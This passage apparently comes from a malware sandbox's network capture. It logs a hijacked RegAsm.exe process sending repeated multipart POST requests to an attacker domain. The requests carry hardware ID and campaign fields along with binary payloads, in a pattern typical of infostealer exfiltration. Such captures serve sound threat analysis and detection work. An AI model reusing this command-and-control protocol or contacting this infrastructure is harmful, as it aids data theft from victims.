3/2uckvdM4gM1NgavpVqfv2nb8T/1GiH/43+Oez1Mhy6n8A9Xs9/0VyT8B67hmdgtJ5p2PrcdsiW6+x8gJ5rOrmf63pVl2fLXtLdH7WbYnv+qGvE/dRoh/eB8Dbp/2BA0vi5cVPRMIQSk5973/8kdu7rMpS08WOc/YqxB+v7fFXEtMMWRplX4ge7unj0k2gxrukq2/XTZprxjfA85vp3Xdr0q3Bc0zSCHd7VAb6UbHT3oWCWurML476H63KwtzJ
2024-05-06 05:53:15 UTC	1369	IN	Data Raw: 33 74 65 32 7a 65 4d 45 64 58 55 48 72 4f 66 5a 32 50 6b 71 47 37 59 2b 4a 73 75 34 4a 58 72 73 7a 58 77 74 53 6f 51 6b 74 47 38 66 6b 6e 52 50 4d 6c 32 75 4d 35 64 33 50 39 39 47 5a 33 41 4b 74 48 34 6d 7a 6a 4b 76 6f 44 39 50 75 50 79 65 56 6e 57 38 4b 74 77 55 74 6b 78 67 42 4c 62 33 52 53 6d 6d 57 46 35 2f 4b 4a 76 32 76 6e 59 63 6f 76 2f 77 4c 31 61 67 35 34 79 56 63 71 30 38 7a 38 5a 38 41 79 2b 50 5a 4f 35 65 4b 76 61 44 42 72 76 77 77 47 39 74 4e 78 73 79 4b 62 43 73 7a 50 67 38 6e 78 57 77 50 71 35 63 31 37 58 4f 59 45 57 31 4e 30 64 75 6f 5a 73 63 50 61 6c 5a 64 37 39 33 32 47 4d 2b 6f 7a 30 63 71 61 64 47 54 6d 53 38 37 4d 39 41 5a 56 2f 6f 52 33 4a 79 31 47 61 6e 32 52 32 35 72 31 78 6c 70 79 77 66 38 61 57 36 2b 70 61 67 35 34 79 56 64 36 30 Data Ascii: 3te2zeMEdXUHrOfZ2PkqG7Y+Jsu4JXrszXwtSoQktG8fknRPMl2uM5d3P99GZ3AKtH4mzjKvoD9PuPyeVnW8KtwUtkxgBLb3RSmmWF5/KJv2vnYcov/wL1ag54yVcq08z8Z8Ay+PZO5eKvaDBrvwwG9tNxsyKbCszPg8nxWwPq5c17XOYEW1N0duoZscPalZd7932GM+oz0cqadGTmS87M9AZV/oR3Jy1Gan2R25r1xlpywf8aW6+pag54yVd60
2024-05-06 05:53:15 UTC	1369	IN	Data Raw: 67 7a 68 78 4c 59 32 68 69 33 6e 6d 31 79 2b 71 31 72 32 50 54 56 59 4d 69 77 36 4a 68 5a 71 50 4a 71 45 6f 71 32 36 31 31 53 77 53 71 4b 44 74 58 57 48 2f 54 38 44 32 36 34 77 77 48 50 6e 4c 41 4c 79 50 6d 4d 73 32 71 71 74 58 78 41 31 76 57 72 64 56 44 62 4e 49 45 4d 31 4e 59 59 75 70 70 76 64 66 71 69 59 64 2f 78 31 32 47 44 39 34 58 33 4f 4f 37 34 4d 68 79 36 6e 38 41 39 58 73 39 2f 30 56 79 54 2f 52 43 37 6e 79 51 5a 6e 62 51 6b 76 70 2f 43 43 4f 4f 56 77 50 51 2b 71 4b 30 77 45 74 58 38 6f 33 4e 61 30 54 53 46 45 74 4c 59 46 62 47 63 59 33 37 78 6f 6d 33 57 38 73 6c 6e 68 66 65 41 2b 44 76 69 38 58 4e 5a 6b 72 72 44 46 6a 4b 58 4f 4a 46 65 69 35 4e 54 68 70 4e 79 59 66 58 72 41 72 33 72 6c 51 76 67 6c 5a 6d 62 57 59 4f 31 64 56 36 53 72 4f 6b 39 56 Data Ascii: gzhxLY2hi3nm1y+q1r2PTVYMiw6JhZqPJqEoq2611SwSqKDtXWH/T8D264wwHPnLALyPmMs2qqtXxA1vWrdVDbNIEM1NYYuppvdfqiYd/x12GD94X3OO74Mhy6n8A9Xs9/0VyT/RC7nyQZnbQkvp/CCOOVwPQ+qK0wEtX8o3Na0TSFEtLYFbGcY37xom3W8slnhfeA+Dvi8XNZkrrDFjKXOJFei5NThpNyYfXrAr3rlQvglZmbWYO1dV6SrOk9V
2024-05-06 05:53:15 UTC	1369	IN	Data Raw: 53 6b 34 6c 52 39 4a 56 6f 66 76 57 6b 61 64 58 31 30 58 4b 61 38 6f 6e 37 4e 2b 54 2b 66 46 54 41 38 71 52 30 57 74 51 32 6a 68 62 66 32 78 43 7a 31 43 6f 5a 6e 63 41 71 30 65 79 62 4f 4d 71 2b 6f 2b 51 69 35 62 55 61 4f 63 32 36 77 78 5a 41 76 31 54 69 58 74 54 64 55 2b 7a 57 4a 48 6e 37 6f 32 44 53 38 39 5a 6e 6a 76 65 53 2b 6a 66 6d 39 58 5a 5a 33 66 4b 76 66 6c 6e 46 4f 59 30 57 30 4e 77 65 75 70 64 67 4d 62 6a 44 41 62 32 30 33 48 6a 49 70 73 4b 7a 41 4f 58 37 61 56 33 56 35 61 45 39 4d 62 77 67 78 33 61 34 79 48 76 66 2f 79 52 32 2b 75 73 79 6c 4c 54 66 62 70 72 31 67 66 67 35 35 76 4a 39 56 39 6a 30 70 48 6c 61 32 54 53 49 48 64 76 63 48 72 71 65 62 58 6a 78 70 32 37 52 74 4a 55 49 34 35 58 41 39 43 71 6f 72 54 41 53 2b 64 57 47 55 56 37 4e 66 2b Data Ascii: Sk4lR9JVofvWkadX10XKa8on7N+T+fFTA8qR0WtQ2jhbf2xCz1CoZncAq0eybOMq+o+Qi5bUaOc26wxZAv1TiXtTdU+zWJHn7o2DS89ZnjveS+jfm9XZZ3fKvflnFOY0W0NweupdgMbjDAb203HjIpsKzAOX7aV3V5aE9Mbwgx3a4yHvf/yR2+usylLTfbpr1gfg55vJ9V9j0pHla2TSIHdvcHrqebXjxp27RtJUI45XA9CqorTAS+dWGUV7Nf+
2024-05-06 05:53:15 UTC	1369	IN	Data Raw: 47 62 4f 59 63 6e 72 33 71 48 7a 62 35 4a 73 49 34 2b 48 4f 6d 31 6e 78 6e 52 6b 35 6b 76 4f 6e 50 51 47 56 66 34 38 58 31 64 59 56 75 6f 5a 68 64 2f 6d 6b 59 39 2f 77 30 32 4f 49 2b 6f 54 30 4e 2b 76 35 65 56 58 52 2b 36 39 30 56 39 34 77 79 56 43 37 75 6e 6a 30 6b 33 77 78 72 75 6b 71 39 2b 2f 59 62 49 57 2b 36 4a 67 74 70 70 30 5a 53 37 71 66 77 44 31 65 32 33 2f 52 58 4a 50 64 48 62 47 55 62 6e 66 79 72 6d 7a 63 38 64 74 72 69 2f 47 45 39 54 62 6e 39 58 6c 62 30 2f 4b 75 64 31 4c 52 4d 6f 6f 59 31 5a 46 64 33 50 38 50 4d 66 47 7a 4b 6f 36 32 6d 30 43 54 38 34 7a 30 63 6f 43 65 62 52 79 36 6e 37 49 56 4d 72 78 2f 6a 68 4b 54 69 56 48 30 6e 32 68 31 38 61 74 6e 31 66 7a 65 5a 49 4c 37 67 50 73 67 34 50 56 31 51 4d 44 30 6f 6e 68 56 31 44 2b 4e 47 4e 72 Data Ascii: GbOYcnr3qHzb5JsI4+HOm1nxnRk5kvOnPQGVf48X1dYVuoZhd/mkY9/w02OI+oT0N+v5eVXR+690V94wyVC7unj0k3wxrukq9+/YbIW+6Jgtpp0ZS7qfwD1e23/RXJPdHbGUbnfyrmzc8dtri/GE9Tbn9Xlb0/Kud1LRMooY1ZFd3P8PMfGzKo62m0CT84z0coCebRy6n7IVMrx/jhKTiVH0n2h18atn1fzeZIL7gPsg4PV1QMD0onhV1D+NGNr
2024-05-06 05:53:15 UTC	1369	IN	Data Raw: 31 73 2f 6e 73 41 42 6c 75 79 62 4f 4d 71 2b 74 66 41 38 35 76 4a 6b 51 35 2f 54 70 58 70 59 77 53 2b 65 45 5a 4f 66 65 39 2f 2f 4a 48 65 32 38 79 69 46 75 72 4d 4c 34 37 36 45 34 6e 4b 77 74 79 49 41 69 61 48 34 4b 67 6d 46 56 2b 49 42 6e 62 6c 34 72 66 77 50 47 72 61 39 4b 6f 36 32 69 53 37 67 6c 65 75 7a 49 4b 69 74 4d 42 4b 56 39 37 6c 76 58 39 51 70 69 6c 6e 74 37 7a 53 69 6e 6d 4e 68 38 62 78 6c 6c 72 71 7a 43 2b 4f 2b 6a 37 4e 71 71 73 77 61 4f 62 6d 66 36 33 52 65 7a 43 36 66 45 38 50 57 55 39 7a 2f 44 30 36 34 77 77 47 39 74 4d 4d 67 30 4c 7a 41 78 6a 48 6d 2b 33 56 45 77 37 6d 4d 61 31 50 51 4c 34 34 4a 33 4a 46 64 33 50 38 50 4d 66 44 72 4d 70 53 6e 6c 51 6a 6a 6c 63 44 33 49 36 69 74 4d 41 4b 41 72 2f 34 75 44 6f 64 74 34 58 58 4d 6e 33 76 66 Data Ascii: 1s/nsABluybOMq+tfA85vJkQ5/TpXpYwS+eEZOfe9//JHe28yiFurML476E4nKwtyIAiaH4KgmFV+IBnbl4rfwPGra9Ko62iS7gleuzIKitMBKV97lvX9Qpilnt7zSinmNh8bxllrqzC+O+j7NqqswaObmf63RezC6fE8PWU9z/D064wwG9tMMg0LzAxjHm+3VEw7mMa1PQL44J3JFd3P8PMfDrMpSnlQjjlcD3I6itMAKAr/4uDodt4XXMn3vf
2024-05-06 05:53:15 UTC	1369	IN	Data Raw: 33 41 4b 74 6d 30 67 79 4b 78 76 6f 50 68 49 4b 66 6b 5a 46 2f 43 38 2b 64 31 53 4e 6f 7a 79 56 43 52 6b 56 2b 77 6e 32 68 30 38 62 73 6c 78 4f 54 51 62 4a 36 79 68 4f 46 79 70 72 63 79 51 39 6e 37 75 58 4e 65 6d 43 36 66 45 38 50 53 46 72 50 59 62 47 44 37 70 79 71 59 74 70 74 31 67 2f 4b 47 2f 69 65 6e 35 47 52 52 78 50 50 6e 64 55 6a 61 4d 38 6b 68 6e 62 6c 34 33 39 52 38 4d 61 37 70 4b 75 50 33 31 57 36 50 36 4a 47 2b 45 75 50 35 63 56 37 54 38 2b 73 7a 4d 62 78 55 79 52 69 54 69 56 48 6e 32 67 77 61 6e 65 74 75 78 37 53 44 49 74 69 73 32 36 5a 68 76 36 55 67 4f 72 6e 72 35 52 55 79 7a 6c 66 69 64 5a 50 48 55 2b 7a 57 4e 6a 2b 65 77 41 47 57 35 70 73 34 79 72 37 48 38 43 44 36 38 33 46 45 30 62 4f 56 51 31 6a 61 4d 4d 55 51 32 4e 45 55 70 49 4a 2f 50 Data Ascii: 3AKtm0gyKxvoPhIKfkZF/C8+d1SNozyVCRkV+wn2h08bslxOTQbJ6yhOFyprcyQ9n7uXNemC6fE8PSFrPYbGD7pyqYtpt1g/KG/ien5GRRxPPndUjaM8khnbl439R8Ma7pKuP31W6P6JG+EuP5cV7T8+szMbxUyRiTiVHn2gwanetux7SDItis26Zhv6UgOrnr5RUyzlfidZPHU+zWNj+ewAGW5ps4yr7H8CD683FE0bOVQ1jaMMUQ2NEUpIJ/P

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49746	104.21.30.191	443	5064	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-06 05:53:22 UTC	292	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 18158 Host: miniaturefinerninewjs.shop
2024-05-06 05:53:22 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 46 31 35 43 39 38 39 30 31 45 45 46 34 30 30 35 44 32 36 34 45 31 33 31 46 46 36 31 44 33 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"DF15C98901EEF4005D264E131FF61D32--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
2024-05-06 05:53:22 UTC	2827	OUT	Data Raw: 4d e7 b8 03 4d ad dd 29 81 f2 25 6f 8d 9b f3 9f 07 bb ae 6e c1 f4 74 a0 46 9e dd 44 3a b6 ea f7 8d 77 8c 30 f7 2d 3a 5e 78 e6 d9 84 b0 07 c8 dc 44 8b 5c 37 7b fb ca 23 5f 36 6d 2b c9 df b7 24 a9 bc 70 d3 dd 98 da 4d 16 48 c1 d0 c9 d5 49 13 55 45 68 ed 5e ef aa d6 a5 b6 55 e8 30 13 67 aa 7a 0c 44 f5 2f c0 e3 2b e7 fb 3b 59 90 f0 70 93 c0 3f ee 4c 10 0e bb be eb 3c d7 34 e8 6e cd 74 c5 e2 cb eb 6d db e8 13 05 d7 da ba 6c 95 3d a2 38 f5 d7 4b e3 d4 69 a8 33 83 0e 15 fa 46 ca d1 d5 a4 6f 98 ff ba be f6 4f ec e7 b8 41 b9 35 35 6f df d7 6e b4 81 3d a9 b9 db c0 6c dc 0d bd e3 2e 85 05 bc 3b 82 4b 1b 1e ce 0b 47 dd 7b be cb 51 82 bb d3 d3 f4 36 9c 58 ee 7c 6d cc b2 92 e5 6e b1 c6 c7 5e d9 b7 ac 49 aa b3 55 f5 d2 ec 6d 9e f3 27 aa 33 f8 52 f0 fd e9 0a 3f 6c af 16 Data Ascii: MM)%ontFD:w0-:^xD\7{#_6m+$pMHIUEh^U0gzD/+;Yp?L<4ntml=8Ki3FoOA55on=l.;KG{Q6X\|mn^IUm'3R?l
2024-05-06 05:53:22 UTC	820	IN	HTTP/1.1 200 OK Date: Mon, 06 May 2024 05:53:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=h4pfukuj1f26630el6m93bcn6q; expires=Thu, 29-Aug-2024 23:40:01 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lXZJiKIZS%2BtmVcxZ2yrDC5GIlM84todLYgla%2FV7RX9DAV4DZp3g3h8I1WloUIKjVJyDvByS88IxvM%2BtJvW8wAZBaUu6UbFtTnOlgLtcz89FM9xkvREaykjsHRJFBwMMH%2BdSH6wsXWfc%2BrOiUgA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87f6b5a12990097d-MIA alt-svc: h3=":443"; ma=86400
2024-05-06 05:53:22 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 34 2e 31 37 2e 34 30 2e 31 30 31 0d 0a Data Ascii: fok 84.17.40.101
2024-05-06 05:53:22 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49747	104.21.30.191	443	5064	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-06 05:53:23 UTC	291	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8779 Host: miniaturefinerninewjs.shop
2024-05-06 05:53:23 UTC	8779	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 46 31 35 43 39 38 39 30 31 45 45 46 34 30 30 35 44 32 36 34 45 31 33 31 46 46 36 31 44 33 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"DF15C98901EEF4005D264E131FF61D32--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
2024-05-06 05:53:23 UTC	818	IN	HTTP/1.1 200 OK Date: Mon, 06 May 2024 05:53:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=p65dr9541qr14t1glr8ub6bb0j; expires=Thu, 29-Aug-2024 23:40:02 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OiJnpqDxl%2Fyo3t1w7imMiihBY9wNZaA%2F7OivoT2kZtQ31RL75bR4opCiYwquWi4qQdBtyMxy8yAGgQZko8i%2BU%2FNoJ5f1ir6bfdqzSesf4B3OsxVsfjnp1aM4Ohu3VaZ4AzpOfh5idrg8BfYG8g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87f6b5a7ae6cda9b-MIA alt-svc: h3=":443"; ma=86400
2024-05-06 05:53:23 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 34 2e 31 37 2e 34 30 2e 31 30 31 0d 0a Data Ascii: fok 84.17.40.101
2024-05-06 05:53:23 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49748	104.21.30.191	443	5064	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-06 05:53:23 UTC	292	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20432 Host: miniaturefinerninewjs.shop
2024-05-06 05:53:23 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 46 31 35 43 39 38 39 30 31 45 45 46 34 30 30 35 44 32 36 34 45 31 33 31 46 46 36 31 44 33 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"DF15C98901EEF4005D264E131FF61D32--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
2024-05-06 05:53:23 UTC	5101	OUT	Data Raw: 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 Data Ascii: `M?lrQMn 64F6(X&7~`aO
2024-05-06 05:53:24 UTC	814	IN	HTTP/1.1 200 OK Date: Mon, 06 May 2024 05:53:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=1k0d1t0fsq6uierioovnh0qbrj; expires=Thu, 29-Aug-2024 23:40:03 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2lh91OpvOr2hJ7OdqbzSaPbkcAn%2FA1tCVKnCMKT17RjcCHakhCoOPUkdXNzxLCeFl3tEPnrVqrl0raJWAZazzGzpOM3sgIY6AYHLaVPHFr1t3fGgsDXU4FDSNEjuCrJL3Ypw408H0%2BcX6yoZwA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87f6b5ad3f72da73-MIA alt-svc: h3=":443"; ma=86400
2024-05-06 05:53:24 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 34 2e 31 37 2e 34 30 2e 31 30 31 0d 0a Data Ascii: fok 84.17.40.101
2024-05-06 05:53:24 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49752	104.21.30.191	443	5064	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-06 05:53:25 UTC	291	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 7079 Host: miniaturefinerninewjs.shop
2024-05-06 05:53:25 UTC	7079	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 46 31 35 43 39 38 39 30 31 45 45 46 34 30 30 35 44 32 36 34 45 31 33 31 46 46 36 31 44 33 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"DF15C98901EEF4005D264E131FF61D32--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
2024-05-06 05:53:25 UTC	816	IN	HTTP/1.1 200 OK Date: Mon, 06 May 2024 05:53:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=brk09g08lo2lndor9q0vb188ms; expires=Thu, 29-Aug-2024 23:40:04 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=APtKCgj3LDvZ9kHgGGrIHxqcgsXGpMcHUjEIibeV8Urc%2FVScvhENfGnXYc4ONHfUEEC0WpMKsYCmIwrrasP3%2Fe6RFV06KzuZOiztXy1HvsE6QpxhAvZt6nqEiynxuweIEEn0bRt%2BdWwPZM3LxA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87f6b5b3c9e59aef-MIA alt-svc: h3=":443"; ma=86400
2024-05-06 05:53:25 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 34 2e 31 37 2e 34 30 2e 31 30 31 0d 0a Data Ascii: fok 84.17.40.101
2024-05-06 05:53:25 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49754	104.21.30.191	443	5064	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-06 05:53:26 UTC	291	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1319 Host: miniaturefinerninewjs.shop
2024-05-06 05:53:26 UTC	1319	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 46 31 35 43 39 38 39 30 31 45 45 46 34 30 30 35 44 32 36 34 45 31 33 31 46 46 36 31 44 33 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"DF15C98901EEF4005D264E131FF61D32--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
